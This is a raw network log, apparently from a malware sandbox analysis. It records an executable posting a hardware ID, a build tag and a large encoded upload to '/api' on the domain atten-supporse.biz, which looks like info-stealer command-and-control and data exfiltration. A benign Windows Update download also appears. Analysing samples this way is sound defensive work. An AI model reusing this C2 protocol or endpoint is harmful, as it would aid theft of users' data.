                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1616&rtt_var=615&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21212&delivery_rate=1764350&cwnd=172&unsent_bytes=0&cid=11da9aad0682222a&ts=1308&x=0"
                                                                                                                                                                                                        2024-12-02 06:37:39 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                        Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                        2024-12-02 06:37:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        5192.168.2.8497104.245.163.56443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:37:40 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=MWU5ENCar6voP1d&MD=YsvgaaP4 HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                                                        2024-12-02 06:37:41 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                        MS-CorrelationId: c0514496-fc54-46b7-882d-62371edadb24
                                                                                                                                                                                                        MS-RequestId: 3e0a9f40-d399-485b-b413-2474dc5141c6
                                                                                                                                                                                                        MS-CV: /FBvlnRd7kinlGwH.0
                                                                                                                                                                                                        X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:37:40 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 24490
                                                                                                                                                                                                        2024-12-02 06:37:41 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                        2024-12-02 06:37:41 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        6192.168.2.849713104.21.16.94436376C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:37:40 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=NESU9FMY1SI10YE8
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 1217
                                                                                                                                                                                                        Host: atten-supporse.biz
                                                                                                                                                                                                        2024-12-02 06:37:40 UTC1217OUTData Raw: 2d 2d 4e 45 53 55 39 46 4d 59 31 53 49 31 30 59 45 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 30 33 43 36 35 45 39 42 36 34 46 36 31 37 42 35 38 44 36 44 41 32 34 31 34 33 34 46 44 30 38 0d 0a 2d 2d 4e 45 53 55 39 46 4d 59 31 53 49 31 30 59 45 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 45 53 55 39 46 4d 59 31 53 49 31 30 59 45 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                                                        Data Ascii: --NESU9FMY1SI10YE8Content-Disposition: form-data; name="hwid"603C65E9B64F617B58D6DA241434FD08--NESU9FMY1SI10YE8Content-Disposition: form-data; name="pid"1--NESU9FMY1SI10YE8Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                                                        2024-12-02 06:37:41 UTC1028INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:37:41 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: PHPSESSID=hsoibjbl8dj21qfqapvpd24795; expires=Fri, 28-Mar-2025 00:24:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wiTg%2F5rVAcHt5DeNOTKiZXK9eP2VqO8%2BV%2BHQ2UUJg2aKPvUHaGtB9u2kKHIN919sk1Bs%2BVh%2BgJ3EeBt91I8dLT%2Ba8qvsZkHhoZhdRCD%2BXl3p%2FwSvqWlCjt%2F2xXHdlhMPBL9ELio%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8eb94f4abd1b0f77-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1591&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2134&delivery_rate=1783750&cwnd=231&unsent_bytes=0&cid=3cb113c29668b2f0&ts=770&x=0"
                                                                                                                                                                                                        2024-12-02 06:37:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                        Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                        2024-12-02 06:37:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        7192.168.2.849716104.21.16.94436376C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:37:43 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=CHN28W9UD98G40IB7
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 570117
                                                                                                                                                                                                        Host: atten-supporse.biz
                                                                                                                                                                                                        2024-12-02 06:37:43 UTC15331OUTData Raw: 2d 2d 43 48 4e 32 38 57 39 55 44 39 38 47 34 30 49 42 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 30 33 43 36 35 45 39 42 36 34 46 36 31 37 42 35 38 44 36 44 41 32 34 31 34 33 34 46 44 30 38 0d 0a 2d 2d 43 48 4e 32 38 57 39 55 44 39 38 47 34 30 49 42 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 48 4e 32 38 57 39 55 44 39 38 47 34 30 49 42 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                                                                                                                        Data Ascii: --CHN28W9UD98G40IB7Content-Disposition: form-data; name="hwid"603C65E9B64F617B58D6DA241434FD08--CHN28W9UD98G40IB7Content-Disposition: form-data; name="pid"1--CHN28W9UD98G40IB7Content-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                                                                                                                        2024-12-02 06:37:43 UTC15331OUTData Raw: 4e 04 eb f4 4c 87 2d 1e 1c 8a e2 0c 86 ec 3b 67 88 85 a7 09 45 d4 a4 65 ae 63 21 24 a1 d8 f6 aa 3e b3 8e f6 09 17 e3 9c 76 5f f6 b7 f1 d9 6a 35 5f db f1 81 f0 e0 04 ec ae 92 a2 08 b2 48 9b 7f be a9 c1 fc d7 4f a7 a2 d4 f6 21 f9 7a 77 56 94 8a d1 01 6e a2 97 e9 37 a9 65 6e d1 22 7a 26 66 f3 5c 8d df 9f d2 f9 b5 b5 a6 18 ff 31 62 3e 54 28 5c e5 37 1a 09 c1 55 50 a9 18 41 fb 5f 38 cf 15 98 b3 87 ea 66 0a 97 fd e6 97 00 22 f7 13 59 a8 c7 c7 58 43 24 1c 77 97 23 63 ef a6 74 7e 13 c4 65 4a 7d 90 a6 aa 33 f2 42 e7 d4 eb e5 51 a1 7f 02 4a 5e 94 d2 33 3d 30 7b 79 54 88 38 93 5c d2 c5 b8 b9 e0 3f 5c c1 37 78 b2 ab 0c 07 27 57 b4 5f 28 ee f1 60 5f fe e7 ab 87 cf ab c0 68 59 ea 42 c2 fb ce 43 81 85 af a6 a5 7c 7f 1d 7c 3c 72 fb 08 44 b9 37 38 f3 4c 0d cc 16 1b 44 2e
                                                                                                                                                                                                        Data Ascii: NL-;gEec!$>v_j5_HO!zwVn7en"z&f\1b>T(\7UPA_8f"YXC$w#ct~eJ}3BQJ^3=0{yT8\?\7x'W_(`_hYBC||<rD78LD.
                                                                                                                                                                                                        2024-12-02 06:37:43 UTC15331OUTData Raw: a6 30 91 bf de 3a e5 9b e4 8d a2 14 c7 29 c2 40 f4 b1 f0 b8 75 cd 2e 8d 47 d4 4b 10 e5 e9 d6 e8 77 8f 97 5a 1e 57 9f da 05 2f 27 b6 3f f3 a8 d2 ad 9c 7a fd ac 8d b6 99 45 3b a7 e4 4f bd 0b 87 f1 03 8f 4f 33 e9 6d ef f2 aa 35 2b c7 da 1a db 0a 9b 8d f4 0d 67 72 0a db f2 d2 82 6e 97 cd bd 62 bf de ee 5b cd 7b 8d fe c8 ab d1 16 39 7e 36 f7 cb e1 45 26 0a 1c 20 b8 cd b0 66 c4 40 e4 d6 da bc 54 fb 44 7a d5 e1 08 9a 22 b0 1b 63 0c 44 ab 01 56 74 08 80 95 2e 81 fc d3 20 1b 11 f6 93 80 71 16 da ba 0c a8 8f 21 8a be ce 2f 27 a0 08 12 5e ae 67 22 76 10 0f 56 12 18 92 20 df 66 15 0d 7c 67 50 f2 ee a0 fb dc a8 10 e8 e4 93 46 87 be bf 85 46 56 c1 8c 99 e1 35 38 54 73 2f 45 90 78 a7 83 19 6e 2c 00 ae 62 5e a0 40 a4 e3 af f7 ac a4 7b 6e 8b 82 de 14 6a ce 70 32 c8 bf 6c
                                                                                                                                                                                                        Data Ascii: 0:)@u.GKwZW/'?zE;OO3m5+grnb[{9~6E& f@TDz"cDVt. q!/'^g"vV f|gPFFV58Ts/Exn,b^@{njp2l
                                                                                                                                                                                                        2024-12-02 06:37:43 UTC15331OUTData Raw: d9 9b a3 17 7c e8 21 6b f4 97 bb 3f 76 39 e9 2e 15 f0 82 68 d7 3d 73 dd 34 51 a3 56 93 37 c3 ee 13 c4 4f b3 32 b0 92 54 4d 04 57 66 25 7d b7 45 2d 3a d4 99 a1 ca 5d 45 cd 3d ab e6 86 30 ef 7a 85 30 44 34 15 fc cf 5e 12 69 6b b7 7b b8 eb 13 ab 8f 6d d9 71 9d ce 3d ee 34 db 55 2b 7f a6 9f 57 bf eb 7d 68 43 c9 35 b6 3c 9d d8 d7 31 da 5d d6 ee 37 cb 28 fa ca 75 f8 4f 8e 92 3a 6d b0 10 12 ed f4 84 dd 56 e3 7b 66 12 67 e8 63 27 b9 7a f4 04 23 f1 bb a6 c6 a7 df a2 bd 9b 32 0f 7c 40 cf 05 bf 29 2c 43 2a f5 8b 5d 2f ee 42 b4 32 5d b1 b9 76 5b 87 48 78 51 47 52 58 ca 8b 10 de 78 8e e6 51 0f c1 36 1e 37 5a 9d c2 c8 76 f1 0c c7 bc e0 54 66 38 18 13 6e bb 00 9f 42 fd ab 82 f1 9d 0d ee 5a fc 2a 31 a4 10 98 ee 2c 40 fe 01 15 78 72 dd 79 17 c0 d4 44 10 83 cd 90 6f 11 8a
                                                                                                                                                                                                        Data Ascii: |!k?v9.h=s4QV7O2TMWf%}E-:]E=0z0D4^ik{mq=4U+W}hC5<1]7(uO:mV{fgc'z#2|@),C*]/B2]v[HxQGRXxQ67ZvTf8nBZ*1,@xryDo
                                                                                                                                                                                                        2024-12-02 06:37:43 UTC15331OUTData Raw: be d0 65 79 c5 bb a9 13 94 78 9a b1 23 74 83 e4 f3 d2 e9 2a 92 82 7b 2c 9a 08 19 0a 29 94 b6 0f 49 8d c1 7a fd d6 ae e0 02 c8 39 50 6b 73 30 a6 36 c9 54 ab 82 3d c5 28 8a 52 f0 df 95 51 ba b1 92 b2 38 c2 d1 53 72 4a 85 82 10 e8 6c e8 7b b2 66 3a 48 4f 00 ef ae 4b 53 0c 89 56 db 55 88 c4 7c e3 16 ce e7 1f a5 e8 6d 2b 08 bd 15 94 a6 8a d0 ed e4 0f e9 70 38 be 63 a3 b7 eb ff 79 9f ea ab 26 ce 3c fb 49 c1 75 1e aa b7 23 e4 90 ac 55 6a 4b af f4 e8 0b ca 1c dd f5 b8 e5 05 db 75 30 1a 41 ea f4 a2 91 84 ed d4 88 2c 6b 1a d8 07 7e e9 85 f5 c9 9f 80 a7 c6 a8 eb 4f 0e 0e e0 4b ea ca f6 de 85 0f 5c b4 cb 78 cb 1b 59 8d d2 5d dc f1 98 68 f9 44 7b f0 ed 56 cd bc e8 90 93 5f c6 7f 7d 75 4a 8b 7e 58 c7 f7 c1 35 68 78 c3 6d 20 1c c1 85 47 e3 9e 34 bd 5c 7e b2 a8 fb 89 10
                                                                                                                                                                                                        Data Ascii: eyx#t*{,)Iz9Pks06T=(RQ8SrJl{f:HOKSVU|m+p8cy&<Iu#UjKu0A,k~OK\xY]hD{V_}uJ~X5hxm G4\~
                                                                                                                                                                                                        2024-12-02 06:37:43 UTC15331OUTData Raw: e2 e5 1d 49 99 73 12 8a f9 8b fa 48 da dd b4 9a 6c f6 2a 47 31 6b 77 b2 66 f8 76 b7 ac 10 e0 0c ce f2 d6 30 fb 87 3f 06 a0 e7 ea 7c 8e bb 5d 12 60 0c 1f 33 d4 0d 3f d4 97 86 38 73 e0 c1 e1 14 8d ca c3 29 18 10 b9 97 0b 16 46 73 4e 0a a3 d3 b9 81 5d 89 8a 04 90 5e 60 32 5c 79 37 e4 94 66 ec 37 ba 15 41 f5 48 d3 6f 2c 90 f8 85 a2 23 8d 39 29 e2 18 7d d8 f7 79 95 5b c7 f9 b5 8b 10 8f 4b c8 8e 4c ec e2 f0 17 df 1f 58 a0 f6 77 10 ee 74 64 1c 63 e9 63 67 cf 07 f3 ff 66 c8 ea 22 aa d1 34 9f 7c 7a da 29 fe d9 aa 37 8e d7 e9 72 02 28 33 bd 6c cb ff dd 84 8f fc 58 67 8a a2 bf f1 fb bf 7b 37 c1 bc 40 bd e3 d9 75 50 68 2f 41 d9 dd e0 84 c2 f1 83 bb 7f 5a 98 51 0a ff c4 48 12 52 0e 3c 43 eb 49 01 42 4a fb ee 41 1b 6f 28 d3 60 43 f4 db af af 53 bc b3 df 59 c7 8a 38 4b
                                                                                                                                                                                                        Data Ascii: IsHl*G1kwfv0?|]`3?8s)FsN]^`2\y7f7AHo,#9)}y[KLXwtdccgf"4|z)7r(3lXg{7@uPh/AZQHR<CIBJAo(`CSY8K
                                                                                                                                                                                                        2024-12-02 06:37:43 UTC15331OUTData Raw: 79 e9 95 ae f2 4a 87 af f3 cd cd 6f 4b 83 df 6d fd 5b b0 7e f6 ab 2c c4 77 ee 34 56 c5 01 83 5f 5e d3 a9 7b d0 52 0a 9d a7 45 66 a9 f8 a5 4b 0f 87 bf 57 fe 51 b7 18 a5 82 8d 74 dd f1 b1 ca a5 ce 5e 29 d8 b7 fa 63 58 5c 5e 86 2a 3d fd 56 a3 44 4e 84 d0 13 5d bb 74 f9 8a 4e 2d 3b ea fc f6 f1 3a 7f e9 bb ed 6f dc c3 f9 75 0e 85 0d bd dd fc 24 29 e0 b2 26 a3 e1 64 9f a8 c1 36 30 a6 1e aa d9 f1 a2 8e df ea 15 52 ff 78 f6 4c f2 88 ab f5 b1 42 c4 70 18 17 e8 92 a2 61 a8 a1 fc f5 f7 76 e2 2e d7 4b 0b 96 ae b7 a6 52 c5 65 2b 73 e6 b3 8f 1a 94 67 f3 37 64 bd a6 24 8a a2 41 12 75 8b 7b 7f ea c7 ed ec 05 c1 7c 63 33 23 dc fa e5 44 34 57 53 2e da fb 89 a4 5f 8b 98 27 2d 33 00 d5 d4 3e 9a b0 5e 8f ed 39 31 fc 6e 3e 84 89 da 29 1e 79 14 00 fc 33 96 39 c5 6c 34 8b 5b 70
                                                                                                                                                                                                        Data Ascii: yJoKm[~,w4V_^{REfKWQt^)cX\^*=VDN]tN-;:ou$)&d60RxLBpav.KRe+sg7d$Au{|c3#D4WS._'-3>^91n>)y39l4[p
                                                                                                                                                                                                        2024-12-02 06:37:43 UTC15331OUTData Raw: ab 80 3d 31 e8 f4 a9 b1 a5 61 20 e7 e9 b6 ee 24 5a c5 c0 7c c4 3f 7d 79 36 f8 46 82 f1 96 f3 2c 6d 32 19 1e 2a aa bb 37 7c 86 69 29 44 da 32 d9 73 19 dc 92 61 6c 8c ec c6 58 2d df 1a fd c9 71 94 0d 4a 97 74 fa cd 15 f2 fd d8 f1 53 d7 37 15 46 9c b7 db 2f ce 1e f1 58 7f 9e 7b 9d f9 33 4c 82 5c c4 2a 2e be 13 a1 28 62 a3 c4 fb ad 8a ec 74 ba 3e 71 fd 16 31 6d b7 c6 be 55 49 6d 7f eb fb d0 7d 55 9d 09 68 d3 ff 13 ad 83 99 46 3b b9 e5 72 eb 7e 4a 85 df fc 6b 4d d4 59 c7 3a 7c c8 29 51 18 04 bd bf f6 df ba 24 7b 1e 9e 6c 75 b6 16 d6 a2 ac 04 82 03 e1 e7 6c dc 30 b0 9d db 1a 7c 5d a8 77 47 34 e1 16 d7 50 dd 66 ab de 80 7b 03 82 dd 6a d1 1d 6b d8 5b 29 20 d7 92 47 f2 1d 9d d9 98 a5 5b 56 6c a4 ab b3 ce 99 e3 17 31 4d d1 6e 47 f2 25 e5 5e e4 d3 55 c7 1b 0e 1c f0
                                                                                                                                                                                                        Data Ascii: =1a $Z|?}y6F,m2*7|i)D2salX-qJtS7F/X{3L\*.(bt>q1mUIm}UhF;r~JkMY:|)Q${lul0|]wG4Pf{jk[) G[Vl1MnG%^U
                                                                                                                                                                                                        2024-12-02 06:37:43 UTC15331OUTData Raw: 70 70 f4 6c 06 15 12 70 ad 7b 66 b4 97 e4 27 89 ee d6 71 1d 49 e5 cb 8b f3 a9 14 e1 ff 7a f3 bb 08 b6 f0 49 77 3a c7 d1 01 76 3a 8a 9c 26 12 7a 55 db d2 3c 88 13 fb 38 72 4c a0 eb 15 e3 01 9c 94 47 da aa ff e5 09 e1 94 29 0e 3b 70 e9 2b 3d 47 11 bd ed 90 70 58 c2 e6 91 25 54 3f 99 9f 73 4d a8 66 90 6f 66 45 d3 77 2e 16 9c ee c5 cf d7 eb b2 93 57 78 86 42 9d 95 a8 f1 cf 59 af f9 19 15 b0 36 d4 60 e8 20 ff c4 b1 20 cf 1b 50 48 bc dd 5b 76 ef b2 2a 79 fd 7d 94 78 31 c9 e9 52 28 0d 26 85 50 ea ba 8f f5 45 ef 04 88 72 ab 1c 9d 2f 26 fb 61 ad 07 88 51 f5 f6 bf e3 2a 81 b7 24 49 85 d7 36 c9 79 b6 21 0b 43 bc 80 a7 d0 c5 60 c0 1e d7 d2 bb a0 1d 87 c7 66 bd 61 eb 7c 96 0a d3 c0 c6 4c 09 74 05 78 89 de 8a 3a 5a 42 1a db 57 73 94 c1 87 9a 3b 70 0a 73 97 04 d1 1e 0d
                                                                                                                                                                                                        Data Ascii: pplp{f'qIzIw:v:&zU<8rLG);p+=GpX%T?sMfofEw.WxBY6` PH[v*y}x1R(&PEr/&aQ*$I6y!C`fa|Ltx:ZBWs;ps
                                                                                                                                                                                                        2024-12-02 06:37:43 UTC15331OUTData Raw: 73 d9 21 fc 27 5a e2 21 68 0b fb b7 89 41 2b e1 0d d4 63 ca a7 29 0c 94 de 2e 47 b4 47 cd 0c 99 84 0e 2f 98 85 3e c4 c0 c9 dc fc ba a9 ba 88 71 e7 85 d7 65 6b 2b 84 20 ff c6 1c 34 96 d5 38 e3 5f 86 3a 67 3c 10 fc 2c a8 8a da 51 53 c7 e9 d8 89 8d 1c 89 5b 73 27 8a ae 23 18 71 00 2d c8 cc 89 f8 e2 95 c3 4e 73 bb c6 0d 9c 8f e2 46 bd c5 c4 45 d4 a8 51 d6 be cf 01 10 4d 15 02 71 9c ed 26 d0 40 31 95 1c 60 79 35 2f 22 ea b8 27 76 f1 c3 66 41 38 98 54 a1 c7 ed 15 62 e5 e9 ff b9 4c f3 5b dc 99 c6 cb 05 ad f5 9b 61 4a c8 68 5e 3c 28 8b e0 75 4c 95 a4 f6 4a 4b 27 79 14 8a 3d 23 06 3c 43 ee 03 da cb 97 bd df 34 c1 3b 46 93 a0 b6 11 f3 5b eb 73 14 f0 ef d0 c0 7f 87 fe bd cb e6 2f 88 fd df e9 a0 9e e4 d7 2d f2 e1 c7 72 0c 81 f4 6a e9 a5 c6 eb 85 0d 80 be 45 fe 9c 25
                                                                                                                                                                                                        Data Ascii: s!'Z!hA+c).GG/>qek+ 48_:g<,QS[s'#q-NsFEQMq&@1`y5/"'vfA8TbL[aJh^<(uLJK'y=#<C4;F[s/-rjE%
                                                                                                                                                                                                        2024-12-02 06:37:50 UTC1025INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:37:50 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: PHPSESSID=6g84seah64skhos63gtbrte1fn; expires=Fri, 28-Mar-2025 00:24:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ev4RVkj%2F9f77XQxklgQ9%2Bhx6kuZErfBREugoc7qMK66U1ba2z%2FrCvJoh03vsK1sRX4gVf0YJY%2FkcwgBr6whRB9nCWNFCkPNLuP948eUgDBAF3J1siZ7EF05lDViYFfqxV3tnHW0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8eb94f5aaf6742e0-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1563&rtt_var=596&sent=206&recv=597&lost=0&retrans=0&sent_bytes=2846&recv_bytes=572665&delivery_rate=1821584&cwnd=252&unsent_bytes=0&cid=0bca4d2bea4e4658&ts=7376&x=0"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        8192.168.2.849718104.21.16.94436376C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:37:51 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Length: 88
                                                                                                                                                                                                        Host: atten-supporse.biz
                                                                                                                                                                                                        2024-12-02 06:37:51 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 36 30 33 43 36 35 45 39 42 36 34 46 36 31 37 42 35 38 44 36 44 41 32 34 31 34 33 34 46 44 30 38
                                                                                                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=603C65E9B64F617B58D6DA241434FD08
                                                                                                                                                                                                        2024-12-02 06:37:53 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:37:52 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: PHPSESSID=pq5ubpno9ffiatvtpahlv532b8; expires=Fri, 28-Mar-2025 00:24:31 GMT; Max-Age=9999999; path=/
